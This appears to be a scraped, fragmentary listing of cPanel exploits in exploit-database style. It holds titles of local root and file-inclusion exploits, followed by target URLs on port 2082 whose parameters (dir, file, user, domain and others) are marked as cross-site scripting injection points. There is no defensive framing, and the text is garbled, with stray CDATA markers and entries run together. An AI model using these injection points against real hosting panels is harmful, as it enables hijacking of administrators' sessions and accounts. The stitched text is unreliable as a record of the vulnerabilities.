]]>cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit]]>
]]>cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit (php)]]>
]]>local cPanel <= 10.8.x cpwrap root exploit via mysqladmin]]>
]]>cPanel <= 10.9.x (fantastico) Local File Inclusion Vulnerabilities]]>
cPanel 10.9.1 XSS
/frontend/x/htaccess/changepro.html?protected=1&resname=XSS_GOES_HERECPanel 10 Multiple Cross Site Scription
CPanel file Manager: http://target.com:2082/frontend/[Servername]/files/seldir.html?dir=[XSS] CPanel Password Protect DIRS: http://target.com:2082/frontend/[servername]/htaccess/newuser. html?user=[XSS]&pass=&dir=A VALID FOLDER In Password Protected DIR: http://www.target:2082/frontend/[servername]/htaccess/newuser. html?user=[XSS]&pass=&dir=[XSS]CPanel 11 Multiple Cross-Site Scription
http://target:2082/frontend/x/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=XSS http://target:2082/frontend/x/files/editit.html?dir=/home/xdemo&file=XSS http://target:2082/frontend/x/files/createdir.html?dir=XSS http://target:2082/frontend/x/htaccess/dohtaccess.html?dir=xss http://target:2082/frontend/x/err/erredit.html?dir=XSS http://target:2082/frontend/x/err/erredit.html?dir=[DIRNAME]&file=XSS http://target:2082/frontend/x/files/createfile.html?dir=XSScPanel Version 11 Pops.Html Cross-Site Scripting
http://target:2082/mail/pops.html?domain=XSS